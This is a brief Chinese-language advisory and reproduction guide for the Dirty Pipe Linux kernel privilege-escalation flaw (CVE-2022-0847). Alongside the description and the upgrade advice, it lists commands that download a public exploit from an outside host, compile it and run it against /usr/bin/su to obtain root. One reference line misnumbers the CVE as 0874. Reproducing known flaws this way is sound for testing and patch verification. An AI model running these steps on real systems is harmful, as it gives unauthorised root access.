漏洞通告:
https://access.redhat.com/security/cve/cve-2022-0847
影响范围:
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
漏洞介绍:
发现新管道缓冲区结构的“标志”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷,因此可能包含陈旧值。非特权本地用户可以使用此漏洞写入由只读文件支持的页面缓存中的页面,从而提升他们在系统上的权限。
漏洞复现:
漏洞exp:(我们这次用1个链接做实验)
1.https://haxx.in/files/dirtypipez.c
2.https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
首先查看内核输入
uname -a
然后输入
sudo wget https://haxx.in/files/dirtypipez.c
进这对dirtypipez.c文件进行编译
gcc -o dirtypipe dirtypipez.c
最后输入西面命令进行权限提升
./dirtypipe /usr/bin/su
解决方案:
请尽快根据官方升级到安全版本
参考文档:
最新Linux内核提权漏洞——Dirty Pipe(CVE-2022-0874) 复现
https://access.redhat.com/security/cve/cve-2022-0847